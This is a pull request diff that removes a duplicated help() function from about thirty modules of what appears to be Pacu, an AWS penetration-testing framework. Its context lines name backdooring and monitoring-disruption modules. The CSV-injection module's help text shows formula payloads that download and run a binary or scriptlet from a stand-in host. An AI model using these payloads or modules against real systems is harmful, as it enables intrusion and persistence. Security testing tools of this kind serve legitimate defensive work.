### PR TITLE
Refactor module help functions

### DIFF
--- a/modules/add_ec2_startup_sh_script/main.py
+++ b/modules/add_ec2_startup_sh_script/main.py
@@ -38,10 +38,6 @@ parser.add_argument('--script', help='File path of the shell script to add to th
 parser.add_argument('--instance-ids', required=False, default=None, help='One or more (comma separated) EC2 instance IDs and their regions in the format instanceid@region. Defaults to all instances.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/backdoor_assume_role/main.py
+++ b/modules/backdoor_assume_role/main.py
@@ -38,10 +38,6 @@ parser.add_argument('--user-arns', required=False, default=None, help='A comma-s
 parser.add_argument('--no-random', required=False, action='store_true', help='If this argument is supplied in addition to a list of user ARNs, a trust relationship is created for each user in the list with each role, rather than one of them at random.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/backdoor_ec2_sec_groups/main.py
+++ b/modules/backdoor_ec2_sec_groups/main.py
@@ -37,10 +37,6 @@ parser.add_argument('--protocol', required=False, default='tcp', help='The proto
 parser.add_argument('--groups', required=False, default=None, help='The EC2 security groups to backdoor in the format of a comma separated list of name@region. If omitted, all security groups will be backdoored.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/backdoor_users_keys/main.py
+++ b/modules/backdoor_users_keys/main.py
@@ -34,10 +34,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--usernames', required=False, default=None, help='A comma-separated list of usernames of the users in the AWS account to backdoor. If not supplied, it defaults to every user in the account')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/backdoor_users_password/main.py
+++ b/modules/backdoor_users_password/main.py
@@ -36,10 +36,6 @@ parser.add_argument('--usernames', required=False, default=None, help='A comma-s
 parser.add_argument('--update', required=False, default=False, action='store_true', help='Try to update login profiles instead of creating a new one. This can be used to change other users passwords who already have a login profile.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/cloudtrail_csv_injection/main.py
+++ b/modules/cloudtrail_csv_injection/main.py
@@ -34,10 +34,6 @@ parser.add_argument('--regions', required=False, default=None, help='A comma-sep
 parser.add_argument('--payload', required=True, help='The formula payload to use. Some examples:\n This formula uses PowerShell to contact an external server to download and execute a binary file: =cmd|\' /C powershell Invoke-WebRequest "http://your-server.com/test.exe" -OutFile "$env:Temp\\shell.exe"; Start-Process "$env:Temp\\shell.exe"\'!A1\nThis formula contacts a remote server to download and execute a .sct file: =MSEXCEL|\'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u /i:http://your-server.com/SCTLauncher.sct scrobj.dll\'!\'\'')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     ###### Don't modify these. They can be removed if you are not using the function.
     args = parser.parse_args(args)

--- a/modules/confirm_permissions/main.py
+++ b/modules/confirm_permissions/main.py
@@ -41,10 +41,6 @@ parser.add_argument('--user-name', required=False, default=None, help='A single 
 # parser.add_argument('--policy-name', required=False, default=None, help='The name of a specific policy to run this module against. By default, this module will be run against the user which the active AWS keys belong to.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/disrupt_monitoring/main.py
+++ b/modules/disrupt_monitoring/main.py
@@ -34,10 +34,6 @@ parser.add_argument('--trails', required=False, default=None, help='Comma-separa
 parser.add_argument('--detectors', required=False, default=None, help='Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/dl_cloudtrail_event_history/main.py
+++ b/modules/dl_cloudtrail_event_history/main.py
@@ -35,10 +35,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/dl_cloudwatch_logs/main.py
+++ b/modules/dl_cloudwatch_logs/main.py
@@ -6,6 +6,7 @@ import datetime
 import pytz
 import csv
 
+
 module_info = {
     'name': 'dl_cloudwatch_logs',
     'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',
@@ -40,10 +41,6 @@ parser.add_argument(
     default=None,
     help='Download logs up to and not including time format "yyyy[-mm[-dd-[hh-mm-ss]]]". Unfilled fields will assume earliest possible time'
 )
-
-
-def help():
-    return [module_info, parser.format_help()]
 
 
 def parse_time(time):

--- a/modules/download_ec2_userdata/main.py
+++ b/modules/download_ec2_userdata/main.py
@@ -36,10 +36,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--instance-ids', required=False, default=None, help='One or more (comma separated) EC2 instance IDs with their regions in the format instance_id@region. Defaults to all EC2 instances.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/download_lightsail_ssh_keys/main.py
+++ b/modules/download_lightsail_ssh_keys/main.py
@@ -32,10 +32,6 @@ module_info = {
 parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     ###### Don't modify these. They can be removed if you are not using the function.
     args = parser.parse_args(args)

--- a/modules/enum_codebuild/main.py
+++ b/modules/enum_codebuild/main.py
@@ -21,10 +21,6 @@ parser.add_argument('--builds', required=False, default=False, action='store_tru
 parser.add_argument('--projects', required=False, default=False, action='store_true', help='Enumerate projects. If this is passed in without --builds, then only projects will be enumerated. By default, both are enumerated.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_ebs_volumes_snapshots/main.py
+++ b/modules/enum_ebs_volumes_snapshots/main.py
@@ -40,10 +40,6 @@ parser.add_argument('--snaps', required=False, default=False, action='store_true
 parser.add_argument('--account-ids', required=False, default=None, help='One or more (comma separated) AWS account IDs. If snapshot enumeration is enabled, then this module will fetch all snapshots owned by each account in this list of AWS account IDs. Defaults to the current user accounts AWS account ID.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_ec2/main.py
+++ b/modules/enum_ec2/main.py
@@ -65,10 +65,6 @@ parser.add_argument('--vpcs', required=False, default=False, action='store_true'
 parser.add_argument('--vpc-endpoints', required=False, default=False, action='store_true', help='Enumerate EC2 VPC endpoints')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_ec2_termination_protection/main.py
+++ b/modules/enum_ec2_termination_protection/main.py
@@ -36,10 +36,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--instances', required=False, default=None, help='A comma separated list of EC2 instances and their regions in the format instanceid@region. The default is to target all instances.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_elb_logging/main.py
+++ b/modules/enum_elb_logging/main.py
@@ -35,10 +35,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_glue/main.py
+++ b/modules/enum_glue/main.py
@@ -46,10 +46,6 @@ parser.add_argument('--dev-endpoints', required=False, default=False, help='Enum
 parser.add_argument('--jobs', required=False, default=False, help='Enumerate Glue jobs.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_lambda/main.py
+++ b/modules/enum_lambda/main.py
@@ -36,11 +36,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--versions-all', required=False, default=False, action='store_true', help='Grab all versions instead of just the latest')
 
 
-# For when "help module_name" is called, don't modify this
-def help():
-    return [module_info, parser.format_help()]
-
-
 # Main is the first function that is called when this module is executed
 def main(args, pacu_main):
     session = pacu_main.get_active_session()

--- a/modules/enum_lightsail/main.py
+++ b/modules/enum_lightsail/main.py
@@ -47,10 +47,6 @@ for field in MASTER_FIELDS:
     add_field(field)
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def setup_storage(fields):
     out = {}
     for field in fields:

--- a/modules/enum_monitoring/main.py
+++ b/modules/enum_monitoring/main.py
@@ -36,10 +36,6 @@ parser.add_argument('--shield', required=False, default=False, action='store_tru
 parser.add_argument('--guard-duty', required=False, default=False, action='store_true', help='Enumerate GuardDuty security implementations.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/enum_users_roles_policies_groups/main.py
+++ b/modules/enum_users_roles_policies_groups/main.py
@@ -38,10 +38,6 @@ parser.add_argument('--policies', required=False, action='store_true', help='Enu
 parser.add_argument('--groups', required=False, action='store_true', help='Enumerate info for groups in the account')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/get_credential_report/main.py
+++ b/modules/get_credential_report/main.py
@@ -34,10 +34,6 @@ module_info = {
 parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/inspector_report_fetcher/main.py
+++ b/modules/inspector_report_fetcher/main.py
@@ -29,10 +29,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 parser.add_argument('--download-reports', required=False, default=False, action='store_true', help='Optional argument to download HTML reports for each run')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
     args = parser.parse_args(args)

--- a/modules/privesc_scan/main.py
+++ b/modules/privesc_scan/main.py
@@ -40,10 +40,6 @@ parser.add_argument('--folder', required=False, default=None, help='A file path 
 parser.add_argument('--scan-only', required=False, default=False, action='store_true', help='Only run the scan to check for possible escalation methods, don\'t attempt any found methods.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 # Permissions to check (x == added checks already):
 # 1)x Associate an existing instance profile with an existing EC2 instance
 #   iam:PassRole

--- a/modules/s3_bucket_dump/main.py
+++ b/modules/s3_bucket_dump/main.py
@@ -38,10 +38,6 @@ parser.add_argument('--names-only', required=False, action='store_true', help='I
 parser.add_argument('--dl-names', required=False, default=False, help='A path to a file that includes the only files to be downloaded, one per line. The format for these files must be "filename.ext@bucketname", which is what the --names-only argument outputs.')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
 

--- a/modules/s3_finder/main.py
+++ b/modules/s3_finder/main.py
@@ -81,10 +81,6 @@ R = '\033[91m'  # red
 W = '\033[0m'   # white
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     ###### Don't modify these. They can be removed if you are not using the function.
     args = parser.parse_args(args)

--- a/modules/sysman_ec2_rce/main.py
+++ b/modules/sysman_ec2_rce/main.py
@@ -42,10 +42,6 @@ parser.add_argument('--replace', required=False, default=False, action='store_tr
 parser.add_argument('--ip-name', required=False, default=None, help='The name of an existing instance profile with an "EC2 Role for Simple Systems Manager" attached to it. This will skip the automatic role/instance profile enumeration and the searching for a Systems Manager role/instance profile')
 
 
-def help():
-    return [module_info, parser.format_help()]
-
-
 def main(args, pacu_main):
     session = pacu_main.get_active_session()
     proxy_settings = pacu_main.get_proxy_settings()

--- a/modules/template.py
+++ b/modules/template.py
@@ -40,6 +40,8 @@ module_info = {
     'arguments_to_autocomplete': [],
 }
 
+# Every module must include an ArgumentParser named "parser", even if it
+# doesn't use any additional arguments.
 parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
 
 # The two add_argument calls are placeholders for arguments. Change as needed.
@@ -52,12 +54,6 @@ parser = argparse.ArgumentParser(add_help=False, description=module_info['descri
 # Make sure to add all arguments to module_info['arguments_to_autocomplete']
 parser.add_argument('', help='')
 parser.add_argument('', required=False, default=None, help='')
-
-
-# For when "help module_name" is called. Don't modify this, and make sure it's
-# included in your module.
-def help():
-    return [module_info, parser.format_help()]
 
 
 # Main is the first function that is called when this module is executed.


### PR DESCRIPTION
Instead of requiring an identical help function in every module,
pacu.py now imports modules' module_info and parser components as
needed and uses them directly.